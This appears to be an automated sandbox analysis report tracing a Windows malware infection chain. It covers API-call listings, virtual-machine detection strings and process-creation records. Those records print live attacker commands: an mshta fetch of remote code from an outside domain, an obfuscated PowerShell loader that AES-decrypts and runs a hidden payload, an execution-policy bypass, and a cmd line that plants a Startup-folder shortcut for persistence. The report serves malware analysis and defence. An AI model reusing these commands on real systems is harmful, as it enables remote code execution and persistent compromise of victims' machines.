Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7644	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5524	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5320	Thread sleep time: -19369081277395017s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A521C7C0 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	15_2_00007FF7A521C7C0
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A522A874 FindFirstFileW,Sleep,FindNextFileW,FindClose,	15_2_00007FF7A522A874
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A5226428 FindFirstFileW,FindNextFileW,FindClose,	15_2_00007FF7A5226428
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A522A4F8 FindFirstFileW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,	15_2_00007FF7A522A4F8
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A522A350 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,	15_2_00007FF7A522A350
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A51E2F50 FindFirstFileExW,	15_2_00007FF7A51E2F50
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A521B7C0 FindFirstFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	15_2_00007FF7A521B7C0
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A52272A8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,	15_2_00007FF7A52272A8
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A52271F4 FindFirstFileW,FindClose,	15_2_00007FF7A52271F4
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A521BC70 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	15_2_00007FF7A521BC70
Source: C:\Users\Public\Guard.exe	Code function: 23_2_00954005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	23_2_00954005
Source: C:\Users\Public\Guard.exe	Code function: 23_2_0095494A GetFileAttributesW,FindFirstFileW,FindClose,	23_2_0095494A
Source: C:\Users\Public\Guard.exe	Code function: 23_2_0095C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	23_2_0095C2FF
Source: C:\Users\Public\Guard.exe	Code function: 23_2_0095CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	23_2_0095CD9F
Source: C:\Users\Public\Guard.exe	Code function: 23_2_0095CD14 FindFirstFileW,FindClose,	23_2_0095CD14
Source: C:\Users\Public\Guard.exe	Code function: 23_2_0095F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	23_2_0095F5D8
Source: C:\Users\Public\Guard.exe	Code function: 23_2_0095F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	23_2_0095F735
Source: C:\Users\Public\Guard.exe	Code function: 23_2_0095FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	23_2_0095FA36
Source: C:\Users\Public\Guard.exe	Code function: 23_2_00953CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	23_2_00953CE2
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Code function: 27_2_00194005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	27_2_00194005
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Code function: 27_2_0019494A GetFileAttributesW,FindFirstFileW,FindClose,	27_2_0019494A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Code function: 27_2_0019C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	27_2_0019C2FF
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Code function: 27_2_0019CD14 FindFirstFileW,FindClose,	27_2_0019CD14
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Code function: 27_2_0019CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	27_2_0019CD9F
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Code function: 27_2_0019F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	27_2_0019F5D8
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Code function: 27_2_0019F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	27_2_0019F735
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Code function: 27_2_0019FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	27_2_0019FA36
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Code function: 27_2_00193CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	27_2_00193CE2

Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe

Code function: 15_2_00007FF7A51C1D80 GetVersionExW,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetSystemInfo,FreeLibrary,

15_2_00007FF7A51C1D80

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: Guard.exe, 00000017.00000002.2633323030.0000000003EEA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll[
Source: powershell.exe, 00000009.00000002.1709946793.000001FB7023F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSIdRom&Ven_NECVMWar&Prod_VMware_
Source: powershell.exe, 00000015.00000002.2030506548.00000234FD090000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW4
Source: powershell.exe, 00000015.00000002.2030506548.00000234FD0EB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}1Mz
Source: powershell.exe, 00000015.00000002.2030506548.00000234FD0EB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: mshta.exe, 00000006.00000003.1727135486.000001CA44DBE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1723431987.000001CA44DBD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1734217919.000001CA44DBE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP`
Source: mshta.exe, 00000006.00000003.1727135486.000001CA44E42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1732303015.000001CA44E42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1732823139.000001CA44E5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1734405681.000001CA44E5B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1723431987.000001CA44E42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2633347801.0000023948841000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2633825359.0000023948854000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2630423028.000002394322B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1712407161.000001FB703F0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: mshta.exe, 00000006.00000002.1734217919.000001CA44DF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1723431987.000001CA44DF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1727135486.000001CA44DF7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBn
Source: SwiftWrite.pif, 0000001B.00000002.2633579998.00000000038CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll-M`b

Source: C:\Windows\System32\wbem\WMIC.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe

Code function: 15_2_00007FF7A5230A00 BlockInput,

15_2_00007FF7A5230A00

Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe

Code function: 15_2_00007FF7A51A37B0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

15_2_00007FF7A51A37B0

Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe

Code function: 15_2_00007FF7A51C5BC0 GetLastError,IsDebuggerPresent,OutputDebugStringW,

15_2_00007FF7A51C5BC0

Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe

Code function: 15_2_00007FF7A51A6D1C LoadLibraryA,GetProcAddress,

15_2_00007FF7A51A6D1C

Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe

Code function: 15_2_00007FF7A51E4318 GetProcessHeap,

15_2_00007FF7A51E4318

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A51DAF58 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_00007FF7A51DAF58
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A51E8FE4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	15_2_00007FF7A51E8FE4
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A51C57E4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_00007FF7A51C57E4
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A51C59C8 SetUnhandledExceptionFilter,	15_2_00007FF7A51C59C8
Source: C:\Users\Public\Guard.exe	Code function: 23_2_0091A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	23_2_0091A385
Source: C:\Users\Public\Guard.exe	Code function: 23_2_0091A354 SetUnhandledExceptionFilter,	23_2_0091A354
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Code function: 27_2_0015A354 SetUnhandledExceptionFilter,	27_2_0015A354
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Code function: 27_2_0015A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	27_2_0015A385

HIPS / PFW / Operating System Protection Evasion

Bypasses PowerShell execution policy

Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"

Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe

15_2_00007FF7A520CE68

Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe

Code function: 15_2_00007FF7A51A37B0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

15_2_00007FF7A51A37B0

Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe

Code function: 15_2_00007FF7A51C4514 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,

15_2_00007FF7A51C4514

Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe

Code function: 15_2_00007FF7A5232464 mouse_event,

15_2_00007FF7A5232464

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://tiffany-careers.com/Ghep2712"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://tiffany-careers.com/Ghep2712	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '9CF532B67986D916047FE0AC0764DA11DC4EADD5CE4C32A9EFBD866103824CD8010E51E35AA8431521E80FD6FD2B3D73241C0BB11F04EE49313A72FA43C65EE5DF342E50AAAB881EB97E2AD4046B96D04E64FD968C51007DBDB019561AAD993D9DDD6B0E95AAC81E269357C5BFEAEA2527E8A20F8FCEEE34F91F72675881E50DCD04295A790A9E13CE9CBF37B601B4FFAFE1D5CAC03DFDA56DCA95FF5424D15D2201EE63774AEF024E5D3441D0810D093A2A8E480D6D4B525FA6FC903E3BDB710FFAE3E893622CE5C8764591B00B8FC9C8100BDA923A83E6F8B88E69B0755D3228D1DC52C7C67BB3B24C6C30B777A5DDDC87AE8DF799E072F9A5A2E930038C7145315FA2576ADA033D15A7764469DE0BD65B7F9E89E55EA0317333FB845BB4339BA707D00A5B4FD12EF2BCA27548187BE559BD1E7662E4B6C54CE3999E1730EED4F58C611CC3B8C64086B0FF8A572FBC600798C70C4872E23D8DFEC08E57EC5BD8C46AD07560467116EEE5F8C78F0BB81E4E5B3A4C92473CAC6FC01E77EEA8F5860B14D885342EF00B915D9B9277B47DD62E92385866D4F08595B75FD3416076067E9C9C3A909D66C4807D3D34D802E94AFD77152A2E8719F1DB90EEEC5D5288DCDA7A440771A416DB8635C548C523B726DA123203E5BB32B7F0239E81E2E1C9948A2D9629655467B0C4210B5562746710458C26E13B06B0E5A0667F3D764E09D22E4F04DB3052359BDDB7C937C0FFC5E7B6BF7B398E140333E5B5B9741857518CBFC0A86CC2756344C085D6D9F6503AEF5967D61A95B8ED8B25A8DB23CFE55452E36DCEAB63EE4F1AA5BB09A1530D0D56F7123EA0E9278D6930295A53624251959B73A845ABD6AFC47B295DDF6B8083CD04B85C0789E0F09013BCBE631B9551A179D39DB7491A04A601C6E09CA8FF994D713877D75EA86A31FF9EC9B2C557BAE8C6A494EA46A84FC08A7DAC1B5ADDD84771E1AEFEEB3418328847AD5670D846972DBA8193DD696F0A22D11217E461ED7E46B33E2EF47F12B09657CB01CC3AE86335B6E69B306E63FDAC762CA62A91E39E7778E3A0CD5C1637FDF8E8F1AEAC86E8AA27EA3EBCD0BF91EFC1995D43D53A9537E8D0E5690CED64DD12BDF582DA4670F8EEC5BD3A43AC5AE823CFCDD2974718561BB5BE154E812A135FF700C05380B3B3283B4E089BA3450995E7D234293C2E6735402BE512FEF974C3031038C10F930900474FD65A4B2251379752BD260DCE20B2B16C34BB0B9B2D96015FEA98D2CA49F108194FF06C88A1B9C28318067753820430FCFFAE689D4A1AF2F1FA1E72325BC53D6460FFF8B5D895BAD7A4562A18E2129A5D836FCFF6CF002491AE00BA0D48891008E3FA63EE6F968719585482A9C78C05CD826A70C2500B84CD750008340587F705F63C221378C17C1FC4F620B61B035696056491071F78A3D4E95A1343424E7664744E454A61727570646663';function HUI ($CXfuOnjU){return -split ($CXfuOnjU -replace '..', '0x$& ')};$FMWRG = HUI($ddg.SubString(0, 2048));$oeC = [System.Security.Cryptography.Aes]::Create();$oeC.Key = HUI($ddg.SubString(2048));$oeC.IV = New-Object byte[] 16;$gVhTqzko = $oeC.CreateDecryptor();$JNWNnV = [System.String]::new($gVhTqzko.TransformFinalBlock($FMWRG, 0,$FMWRG.Length)); sal fd $JNWNnV.Substring(3,3); fd $JNWNnV.Substring(6)	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Project_Information.pdf"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\qJXhXwR.exe "C:\Users\user\AppData\Roaming\qJXhXwR.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\Public\Guard.exe "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop $ddg = '9cf532b67986d916047fe0ac0764da11dc4eadd5ce4c32a9efbd866103824cd8010e51e35aa8431521e80fd6fd2b3d73241c0bb11f04ee49313a72fa43c65ee5df342e50aaab881eb97e2ad4046b96d04e64fd968c51007dbdb019561aad993d9ddd6b0e95aac81e269357c5bfeaea2527e8a20f8fceee34f91f72675881e50dcd04295a790a9e13ce9cbf37b601b4ffafe1d5cac03dfda56dca95ff5424d15d2201ee63774aef024e5d3441d0810d093a2a8e480d6d4b525fa6fc903e3bdb710ffae3e893622ce5c8764591b00b8fc9c8100bda923a83e6f8b88e69b0755d3228d1dc52c7c67bb3b24c6c30b777a5dddc87ae8df799e072f9a5a2e930038c7145315fa2576ada033d15a7764469de0bd65b7f9e89e55ea0317333fb845bb4339ba707d00a5b4fd12ef2bca27548187be559bd1e7662e4b6c54ce3999e1730eed4f58c611cc3b8c64086b0ff8a572fbc600798c70c4872e23d8dfec08e57ec5bd8c46ad07560467116eee5f8c78f0bb81e4e5b3a4c92473cac6fc01e77eea8f5860b14d885342ef00b915d9b9277b47dd62e92385866d4f08595b75fd3416076067e9c9c3a909d66c4807d3d34d802e94afd77152a2e8719f1db90eeec5d5288dcda7a440771a416db8635c548c523b726da123203e5bb32b7f0239e81e2e1c9948a2d9629655467b0c4210b5562746710458c26e13b06b0e5a0667f3d764e09d22e4f04db3052359bddb7c937c0ffc5e7b6bf7b398e140333e5b5b9741857518cbfc0a86cc2756344c085d6d9f6503aef5967d61a95b8ed8b25a8db23cfe55452e36dceab63ee4f1aa5bb09a1530d0d56f7123ea0e9278d6930295a53624251959b73a845abd6afc47b295ddf6b8083cd04b85c0789e0f09013bcbe631b9551a179d39db7491a04a601c6e09ca8ff994d713877d75ea86a31ff9ec9b2c557bae8c6a494ea46a84fc08a7dac1b5addd84771e1aefeeb3418328847ad5670d846972dba8193dd696f0a22d11217e461ed7e46b33e2ef47f12b09657cb01cc3ae86335b6e69b306e63fdac762ca62a91e39e7778e3a0cd5c1637fdf8e8f1aeac86e8aa27ea3ebcd0bf91efc1995d43d53a9537e8d0e5690ced64dd12bdf582da4670f8eec5bd3a43ac5ae823cfcdd2974718561bb5be154e812a135ff700c05380b3b3283b4e089ba3450995e7d234293c2e6735402be512fef974c3031038c10f930900474fd65a4b2251379752bd260dce20b2b16c34bb0b9b2d96015fea98d2ca49f108194ff06c88a1b9c28318067753820430fcffae689d4a1af2f1fa1e72325bc53d6460fff8b5d895bad7a4562a18e2129a5d836fcff6cf002491ae00ba0d48891008e3fa63ee6f968719585482a9c78c05cd826a70c2500b84cd750008340587f705f63c221378c17c1fc4f620b61b035696056491071f78a3d4e95a1343424e7664744e454a61727570646663';function hui ($cxfuonju){return -split ($cxfuonju -replace '..', '0x$& ')};$fmwrg = hui($ddg.substring(0, 2048));$oec = [system.security.cryptography.aes]::create();$oec.key = hui($ddg.substring(2048));$oec.iv = new-object byte[] 16;$gvhtqzko = $oec.createdecryptor();$jnwnnv = [system.string]::new($gvhtqzko.transformfinalblock($fmwrg, 0,$fmwrg.length)); sal fd $jnwnnv.substring(3,3); fd $jnwnnv.substring(6)
Source: C:\Users\Public\Guard.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & echo url="c:\users\user\appdata\local\wordgenius technologies\swiftwrite.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & exit
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop $ddg = '9cf532b67986d916047fe0ac0764da11dc4eadd5ce4c32a9efbd866103824cd8010e51e35aa8431521e80fd6fd2b3d73241c0bb11f04ee49313a72fa43c65ee5df342e50aaab881eb97e2ad4046b96d04e64fd968c51007dbdb019561aad993d9ddd6b0e95aac81e269357c5bfeaea2527e8a20f8fceee34f91f72675881e50dcd04295a790a9e13ce9cbf37b601b4ffafe1d5cac03dfda56dca95ff5424d15d2201ee63774aef024e5d3441d0810d093a2a8e480d6d4b525fa6fc903e3bdb710ffae3e893622ce5c8764591b00b8fc9c8100bda923a83e6f8b88e69b0755d3228d1dc52c7c67bb3b24c6c30b777a5dddc87ae8df799e072f9a5a2e930038c7145315fa2576ada033d15a7764469de0bd65b7f9e89e55ea0317333fb845bb4339ba707d00a5b4fd12ef2bca27548187be559bd1e7662e4b6c54ce3999e1730eed4f58c611cc3b8c64086b0ff8a572fbc600798c70c4872e23d8dfec08e57ec5bd8c46ad07560467116eee5f8c78f0bb81e4e5b3a4c92473cac6fc01e77eea8f5860b14d885342ef00b915d9b9277b47dd62e92385866d4f08595b75fd3416076067e9c9c3a909d66c4807d3d34d802e94afd77152a2e8719f1db90eeec5d5288dcda7a440771a416db8635c548c523b726da123203e5bb32b7f0239e81e2e1c9948a2d9629655467b0c4210b5562746710458c26e13b06b0e5a0667f3d764e09d22e4f04db3052359bddb7c937c0ffc5e7b6bf7b398e140333e5b5b9741857518cbfc0a86cc2756344c085d6d9f6503aef5967d61a95b8ed8b25a8db23cfe55452e36dceab63ee4f1aa5bb09a1530d0d56f7123ea0e9278d6930295a53624251959b73a845abd6afc47b295ddf6b8083cd04b85c0789e0f09013bcbe631b9551a179d39db7491a04a601c6e09ca8ff994d713877d75ea86a31ff9ec9b2c557bae8c6a494ea46a84fc08a7dac1b5addd84771e1aefeeb3418328847ad5670d846972dba8193dd696f0a22d11217e461ed7e46b33e2ef47f12b09657cb01cc3ae86335b6e69b306e63fdac762ca62a91e39e7778e3a0cd5c1637fdf8e8f1aeac86e8aa27ea3ebcd0bf91efc1995d43d53a9537e8d0e5690ced64dd12bdf582da4670f8eec5bd3a43ac5ae823cfcdd2974718561bb5be154e812a135ff700c05380b3b3283b4e089ba3450995e7d234293c2e6735402be512fef974c3031038c10f930900474fd65a4b2251379752bd260dce20b2b16c34bb0b9b2d96015fea98d2ca49f108194ff06c88a1b9c28318067753820430fcffae689d4a1af2f1fa1e72325bc53d6460fff8b5d895bad7a4562a18e2129a5d836fcff6cf002491ae00ba0d48891008e3fa63ee6f968719585482a9c78c05cd826a70c2500b84cd750008340587f705f63c221378c17c1fc4f620b61b035696056491071f78a3d4e95a1343424e7664744e454a61727570646663';function hui ($cxfuonju){return -split ($cxfuonju -replace '..', '0x$& ')};$fmwrg = hui($ddg.substring(0, 2048));$oec = [system.security.cryptography.aes]::create();$oec.key = hui($ddg.substring(2048));$oec.iv = new-object byte[] 16;$gvhtqzko = $oec.createdecryptor();$jnwnnv = [system.string]::new($gvhtqzko.transformfinalblock($fmwrg, 0,$fmwrg.length)); sal fd $jnwnnv.substring(3,3); fd $jnwnnv.substring(6)	Jump to behavior
Source: C:\Users\Public\Guard.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & echo url="c:\users\user\appdata\local\wordgenius technologies\swiftwrite.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & exit

Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe

Code function: 15_2_00007FF7A520C5FC GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

15_2_00007FF7A520C5FC

Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe

Code function: 15_2_00007FF7A520D540 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

15_2_00007FF7A520D540

Source: powershell.exe, 00000009.00000002.1654631616.000001FB6859F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1654631616.000001FB6830F000.00000004.00000800.00020000.00000000.sdmp, qJXhXwR.exe, 0000000F.00000000.1554853365.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: qJXhXwR.exe, Guard.exe, SwiftWrite.pif	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe

Code function: 15_2_00007FF7A51DFD20 cpuid

15_2_00007FF7A51DFD20

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
